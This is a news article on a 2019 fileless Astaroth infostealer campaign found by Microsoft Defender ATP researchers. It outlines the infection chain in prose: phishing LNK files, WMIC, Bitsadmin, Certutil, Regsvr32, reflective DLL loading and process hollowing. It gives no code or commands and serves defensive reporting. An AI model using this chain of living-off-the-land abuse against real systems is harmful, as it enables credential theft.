A fileless malware campaign used by attackers to drop the information stealing Astaroth Trojan into the memory of infected computers was detected by Microsoft Defender ATP Research Team researchers.

The Astaroth Trojan and information stealer is a malware strain capable of stealing sensitive information such as user credentials from its victims using a key logger module, operating system calls interception, and clipboard monitoring.

Astaroth is also known for abusing living-off-the-land binaries (LOLbins) such as the command line interface of the Windows Management Instrumentation Command-line (WMIC) to stealthily download and install malware payloads in the background.

We recently unearthed a campaign that completely "lived off the land" throughout a complex attack chain that ran the info-stealing backdoor #Astaroth directly in memory. See how #MicrosoftDefenderATP next-gen protection defeated the #fileless attack: https://t.co/c2G53Ll2kf — Microsoft Security Intelligence (@MsftSecIntel) July 8, 2019

The malware campaign discovered by the Microsoft Defender ATP Research Team uses several lifeless techniques and a multi-stage infection process that starts with a spear-phishing email containing a malicious link that leaded the potential victims to an LNK file.

After being double-clicked, "LNK file causes the execution of the WMIC tool with the “/Format” parameter, which allows the download and execution of a JavaScript code. The JavaScript code in turn downloads payloads by abusing the Bitsadmin tool."

The malicious payloads downloaded in the background are all Base64-encoded and get decoded on the compromised systems using the legitimate Certutil tool in the form of four DLLs that will be loaded with the help of the Regsvr32 tool.

The loaded DLL file will subsequently load a second DLL in memory that will reflectively load a third one, designed to decrypt and inject yet another DLL into Userinit. This fourth DLL acts as a proxy which will reflectively load a fifth DLL into memory using process hollowing.

Multi-stage infection process

This fifth and last DLL file is the final Astaroth infostealer Trojan malware payload that will collect and exfiltrate various types of sensitive info from its victims to command-and-control (C2) servers controlled by the attackers.

"It’s interesting to note that at no point during the attack chain is any file run that’s not a system tool. This technique is called living off the land: using legitimate tools that are already present on the target system to masquerade as regular activity," added the researchers.

Microsoft's researchers describe only the initial and execution stages of the malware attack in their report given that they only focused on how the Trojan infection was detected and blocked by Microsoft Defender ATP.

The defense features and technologies used by Microsoft Defender ATP to stop the infection are detailed in a graph detailing stage-by-stage the solutions used to identify and prevent an Astaroth infection on affected Windows computers.

Blocking Astaroth's fileless techniques

Microsoft Defender ATP Research Team also enumerates the techniques used in the Astaroth fileless malware attack on each infection stage and the Windows tools employed to stealthily spread the infection on compromised systems.

As Microsoft Defender ATP Research's Andrea Lelli concluded, "abusing fileless techniques does not put malware beyond the reach or visibility of security software. On the contrary, some of the fileless techniques may be so unusual and anomalous that they draw immediate attention to the malware, in the same way that a bag of money moving by itself would."

Back in February, another Astaroth campaign was observed by Cybereason while exploiting security and anti-malware solutions, as well as living-off-the-land techniques and abusing living-off-the-land binaries (LOLbins) to steal information from European and Brazilian targets.

Cofense's Phishing Defense Center (PDC) also spotted a malspam campaign distributing Astaroth in September 2018 and exclusively targeting South American victims, with around 8,000 machines potentially compromised within a single week of attacks.

Update July 09: Added info on the Astaroth campaign discovered by Cofense in 2018.